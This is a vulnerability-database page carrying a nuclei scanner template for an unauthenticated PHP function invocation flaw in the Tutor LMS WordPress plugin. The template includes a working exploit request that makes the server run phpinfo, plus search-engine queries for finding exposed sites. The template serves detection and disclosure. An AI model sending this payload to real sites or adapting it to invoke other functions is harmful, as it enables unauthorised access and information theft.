Lucene search
+L

Tutor LMS < 4.0.6 - Unauthenticated Arbitrary PHP Function Invocation

🗓️ 03 Sep 2026 02:10:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 4 Views

Unauth arbitrary PHP function invocation in Tutor LMS < 4.0.6 via template injection.

Related
Refs
Code
id: CVE-2026-19092

info:
  name: Tutor LMS < 4.0.6 - Unauthenticated Arbitrary PHP Function Invocation
  author: aryu-ru
  severity: critical
  description: |
    Tutor LMS WordPress plugin < 4.0.6 contains a template injection caused by insufficient prevention of request data overwriting internal variables during template rendering, letting unauthenticated attackers invoke arbitrary zero-argument PHP functions and receive their output.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP functions and obtain their output, potentially leading to information disclosure or further exploitation.
  remediation: |
    Update to version 4.0.6 or later.
  reference:
    - https://wpscan.com/vulnerability/da7fb4c7-6d07-4c96-bde2-95bca1797d56/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-19092
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-19092
    epss-score: 0.01498
    epss-percentile: 0.72465
    cwe-id: CWE-74
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/tutor/"
    fofa-query: body="/wp-content/plugins/tutor/"
  tags: cve,cve2026,wordpress,wp,wp-plugin,tutor-lms,rce,unauth

variables:
  ctx: "{{rand_base(8, 'abcdefghijklmnopqrstuvwxyz')}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "_tutor_nonce")'
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: nonce
        group: 1
        internal: true
        regex:
          - '"_tutor_nonce":"([a-z0-9]+)"'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=tutor_course_filter_ajax&_tutor_nonce={{nonce}}&template=single-content-loader&data[context]={{ctx}}&data[method_map][{{ctx}}]=phpinfo

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"success\":true", "PHP Extension Build", "Configuration File (php.ini) Path", "allow_url_fopen")'
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'PHP Version ([0-9]+\.[0-9]+\.[0-9]+)'
# digest: 4a0a0047304502201bf3e08e69096065691a69d9d9ecd6fb365af55e959bde9b4f254eb1631c1083022100830887eda14c16e8861ff9067915fe3332fee7be48dcded00c40abc8057363f2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2026 03:50Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.01498
SSVC
4